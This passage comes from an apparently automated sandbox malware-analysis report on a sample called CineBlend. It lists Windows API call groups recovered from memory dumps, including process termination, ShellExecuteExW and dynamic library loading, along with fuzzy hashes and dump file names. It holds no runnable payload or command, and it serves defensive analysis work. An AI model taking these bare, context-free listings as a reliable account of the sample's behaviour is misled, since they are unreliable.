                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B63727
                                          • SetLastError.KERNEL32(00000000,?,00B636E9,00B63355), ref: 00B63779
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: af8dddebc45cf67fcf1d94eb42282b4df0c953b567ba236fc4ebb0ea51f60cd6
                                          • Instruction ID: e2d16cebfc1f1ffd26905cb3c0eb64b66e1650320d4a8db26e4739dad593d661
                                          • Opcode Fuzzy Hash: af8dddebc45cf67fcf1d94eb42282b4df0c953b567ba236fc4ebb0ea51f60cd6
                                          • Instruction Fuzzy Hash: 0401D4B661E7116EE62427F4ACC6B7E2BE4EB15F7572002BAF216451F0EF5A4D029140
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00B72908,00C09B48,0000000C,00B63268,00000001,?,?), ref: 00B730EB
                                          • _free.LIBCMT ref: 00B7311E
                                          • _free.LIBCMT ref: 00B73146
                                          • SetLastError.KERNEL32(00000000), ref: 00B73153
                                          • SetLastError.KERNEL32(00000000), ref: 00B7315F
                                          • _abort.LIBCMT ref: 00B73165
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 9ca7759dafc601c3562b20e69447214d8c84233d133210d826ff4a9f0987f190
                                          • Instruction ID: fcef1d8609706a6f0fbd25b7a72cc129fe6f4c2b22f7f91dcf1c192dc6151170
                                          • Opcode Fuzzy Hash: 9ca7759dafc601c3562b20e69447214d8c84233d133210d826ff4a9f0987f190
                                          • Instruction Fuzzy Hash: 2DF0F43650050076C2222739AC06B5E13EADFC1F70F61C0A9F93CE22D2EF208A02A161
                                          APIs
                                            • Part of subcall function 00B41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B41F87
                                            • Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41F96
                                            • Part of subcall function 00B41F2D: BeginPath.GDI32(?), ref: 00B41FAD
                                            • Part of subcall function 00B41F2D: SelectObject.GDI32(?,00000000), ref: 00B41FD6
                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BD94AA
                                          • LineTo.GDI32(?,00000003,00000000), ref: 00BD94BE
                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BD94CC
                                          • LineTo.GDI32(?,00000000,00000003), ref: 00BD94DC
                                          • EndPath.GDI32(?), ref: 00BD94EC
                                          • StrokePath.GDI32(?), ref: 00BD94FC
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          • Opcode ID: d4e053622e1de7a3e04659b7d5ec80a522e845de720b6c872138973f4d44d555
                                          • Instruction ID: b84f201d7baf0105ece0ab098ae0eec81864c3b6fb89aee4b1f7d0c6dfc93b8c
                                          • Opcode Fuzzy Hash: d4e053622e1de7a3e04659b7d5ec80a522e845de720b6c872138973f4d44d555
                                          • Instruction Fuzzy Hash: 2A115E7600110DBFDF029F94DC88FDABFACEB08360F00C062BA4946161D7719D55DBA0
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00BA5B7C
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BA5B8D
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA5B94
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00BA5B9C
                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BA5BB3
                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00BA5BC5
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 88587c4ada28e651966238390b7f09bb810ab5a9f37ebb8840e3d14ab0c4b36e
                                          • Instruction ID: cee2ed30f567f63967bc2ed9db203f602714992beffa95767ae5c0f07855274a
                                          • Opcode Fuzzy Hash: 88587c4ada28e651966238390b7f09bb810ab5a9f37ebb8840e3d14ab0c4b36e
                                          • Instruction Fuzzy Hash: 69014875A01714BBDB105FA59C45F4EBFB8EB49751F0440A6FA45A7280D6709D00CBA0
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B432AF
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B432B7
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B432C2
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B432CD
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B432D5
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B432DD
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: efec00f5cab3f95c815e754a2b28b8f1784349e9a7fde57c43ff492496eead40
                                          • Instruction ID: ddfc38d49eb91464cc10938b32bd511555efaf1a0d3442df7fd8e4474a760a4c
                                          • Opcode Fuzzy Hash: efec00f5cab3f95c815e754a2b28b8f1784349e9a7fde57c43ff492496eead40
                                          • Instruction Fuzzy Hash: 110167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BAF447
                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BAF45D
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00BAF46C
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF47B
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF485
                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BAF48C
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                          • String ID:
                                          • API String ID: 839392675-0
                                          • Opcode ID: 1490b1d7c990266b461a1753b2d3b0726de451a0702bef94984a31b2d27ceb5a
                                          • Instruction ID: 3854aec265a9e9b20ee3b273fd9661073b390db06f2b5d2f89b3dbe1144e1b6f
                                          • Opcode Fuzzy Hash: 1490b1d7c990266b461a1753b2d3b0726de451a0702bef94984a31b2d27ceb5a
                                          • Instruction Fuzzy Hash: C1F03032242158BBE7215B529C0EEEFBF7CEFC7B11F00005AF641A2190EBA05A01C6B5
                                          APIs
                                          • GetClientRect.USER32(?), ref: 00B834EF
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B83506
                                          • GetWindowDC.USER32(?), ref: 00B83512
                                          • GetPixel.GDI32(00000000,?,?), ref: 00B83521
                                          • ReleaseDC.USER32(?,00000000), ref: 00B83533
                                          • GetSysColor.USER32(00000005), ref: 00B8354D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                          • String ID:
                                          • API String ID: 272304278-0
                                          • Opcode ID: 38b647795b1d4a484a3d6811195eea3e5e4f08ca6eba6fc85a9e98e2b0967073
                                          • Instruction ID: f19d4ecb0dff989801ad5f6bd2aa20bbf85240ea8567a02638c4e9ef27d32335
                                          • Opcode Fuzzy Hash: 38b647795b1d4a484a3d6811195eea3e5e4f08ca6eba6fc85a9e98e2b0967073
                                          • Instruction Fuzzy Hash: A8012831501105EFDB506B64DC19BE9BBF5FB14721F5001A1F95AA31A0DF311E51EB50
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA21CC
                                          • UnloadUserProfile.USERENV(?,?), ref: 00BA21D8
                                          • CloseHandle.KERNEL32(?), ref: 00BA21E1
                                          • CloseHandle.KERNEL32(?), ref: 00BA21E9
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA21F2
                                          • HeapFree.KERNEL32(00000000), ref: 00BA21F9
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                          • String ID:
                                          • API String ID: 146765662-0
                                          • Opcode ID: 59add25d0cd1c31050629704071ead1561ca828d62d13334dbee222c9e7367d3
                                          • Instruction ID: 2670dbdf25d849d42c77c3253de15c7cf6777d829d79f8c701e0f04a53a5d06f
                                          • Opcode Fuzzy Hash: 59add25d0cd1c31050629704071ead1561ca828d62d13334dbee222c9e7367d3
                                          • Instruction Fuzzy Hash: 3FE0E576005105FBDB012FA1EC1C90AFF39FF49322B104222F26593070EF329420DB50
                                          APIs
                                            • Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BACF99
                                          • _wcslen.LIBCMT ref: 00BACFE0
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BAD047
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BAD075
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info_wcslen$Default
                                          • String ID: 0
                                          • API String ID: 1227352736-4108050209
                                          • Opcode ID: 67eaab8e4323074aab24d409a4d7cead2054c04de4d3c4f53f8405e75b8c9e72
                                          • Instruction ID: f744ce063a319bd13ee85ecc62f11359d801ee8e84e1960e5df2aba9540c8200
                                          • Opcode Fuzzy Hash: 67eaab8e4323074aab24d409a4d7cead2054c04de4d3c4f53f8405e75b8c9e72
                                          • Instruction Fuzzy Hash: 0A51DE7161C300AFD724AF28C895BAFBBE8EF47314F040AA9F996D31A0DB74C9458752
                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00BCB903
                                            • Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF
                                          • GetProcessId.KERNEL32(00000000), ref: 00BCB998
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCB9C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                          • String ID: <$@
                                          • API String ID: 146682121-1426351568
                                          • Opcode ID: 5ec152dd652e903680ff1317b804ed849cf3c77fc2610f620bea86c5ea8f815e
                                          • Instruction ID: 64eaca929169c4fd0ed33fbb6f87c9d76c66b3a747c4872a1774350422df3f4c
                                          • Opcode Fuzzy Hash: 5ec152dd652e903680ff1317b804ed849cf3c77fc2610f620bea86c5ea8f815e
                                          • Instruction Fuzzy Hash: FB713475A00219DFCB14EFA4C495E9EBBF4FF08310F048499E956AB262CB74EE45CB90
                                          APIs
                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA7B6D
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BA7BA3
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BA7BB4
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7C36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: e861521543a6feef0dc8816a3cfbd2272799d5b2f722aa9b1f19dfa83a4bbd26
                                          • Instruction ID: 1f668418f252587a440580ad9b67afac7dba5087f6a497c14ba58e1278b4d535
                                          • Opcode Fuzzy Hash: e861521543a6feef0dc8816a3cfbd2272799d5b2f722aa9b1f19dfa83a4bbd26
                                          • Instruction Fuzzy Hash: 4D418FB164C204EFDB15DF64DC84A9ABBF9EF45324B1480E9A9059F205EBB1D944CBA0
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD48D1
                                          • IsMenu.USER32(?), ref: 00BD48E6
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD492E
                                          • DrawMenuBar.USER32 ref: 00BD4941
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert
                                          • String ID: 0
                                          • API String ID: 3076010158-4108050209
                                          • Opcode ID: 64ea5966f3cd2b5e60b441e8b8146c968de06da3516621dfaa84247020db5aeb
                                          • Instruction ID: 4dedcd0cf333d2d360d5f6d1ad1c4b08b493265341f913f8da1fca190d893ff6
                                          • Opcode Fuzzy Hash: 64ea5966f3cd2b5e60b441e8b8146c968de06da3516621dfaa84247020db5aeb
                                          • Instruction Fuzzy Hash: F6416CB5A0120AEFDB10CF56D894EAABBF5FF06324F0441AAE94597350E734AD54CB60
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA27B3
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA27C6
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA27F6
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$_wcslen$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 2081771294-1403004172
                                          • Opcode ID: c85fe51c5d423cd1b0485adefa9261d0739491a72830e7eb88c167c3d706da14
                                          • Instruction ID: ebb9f69853d1f85c0c7d347c9b1eb980fcab170dd4470c4f28beae4f04cdc9d0
                                          • Opcode Fuzzy Hash: c85fe51c5d423cd1b0485adefa9261d0739491a72830e7eb88c167c3d706da14
                                          • Instruction Fuzzy Hash: 0621F371944104BFDB05ABA4D886CFEB7F8DF56360F1041AAF461A71E1DB384E0ADA60
                                          APIs
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD3A29
                                          • LoadLibraryW.KERNEL32(?), ref: 00BD3A30
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD3A45
                                          • DestroyWindow.USER32(?), ref: 00BD3A4D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                          • String ID: SysAnimate32
                                          • API String ID: 3529120543-1011021900
                                          • Opcode ID: c224114fb95be639202b4521737f208c7199a7a9783e529cc339e13a8ef61d6e
                                          • Instruction ID: 6c3adeaf1703d9ad1efae0df5265376544d296f3f935c5f1eaee65957857707b
                                          • Opcode Fuzzy Hash: c224114fb95be639202b4521737f208c7199a7a9783e529cc339e13a8ef61d6e
                                          • Instruction Fuzzy Hash: 0121D171200205ABEB108F64DC90FBFBBE9EB44B64F105656FA91922D2E771CD409B61
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B6508E,00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002), ref: 00B650FD
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B65110
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B6508E,00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000), ref: 00B65133
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: dc88896637e4df4ac2a504f8266be952f6155d4f647d6374d4954677c045ed1e
                                          • Instruction ID: cbd8d7edc133365377beab8593fdcae860bbfc6e869c0203d8d1f8ee10a49e9b
                                          • Opcode Fuzzy Hash: dc88896637e4df4ac2a504f8266be952f6155d4f647d6374d4954677c045ed1e
                                          • Instruction Fuzzy Hash: DEF06234A41208BBDB119F95DC59BADBFF8EF08B52F0000A5F809B2160DF799E90DA94
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4664A
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B4665C
                                          • FreeLibrary.KERNEL32(00000000,?,?,00B4668B,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B4666E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 145871493-3689287502
                                          • Opcode ID: ce9702be1816438bbb3837a867cf3f8e8769fbb1516e3de7f638146526967ade
                                          • Instruction ID: 2ba8165589c07f97c976b1149567d466b0408bf0c192de81babfc5ca4df9a3b9
